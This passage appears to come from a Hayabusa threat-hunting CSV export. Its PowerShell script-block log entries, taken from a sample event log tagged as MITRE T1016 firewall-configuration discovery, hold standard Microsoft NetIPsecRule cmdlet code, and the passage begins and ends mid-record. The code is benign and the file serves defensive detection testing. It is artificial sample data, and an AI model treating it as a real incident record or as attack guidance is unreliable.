[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_v",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"alues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 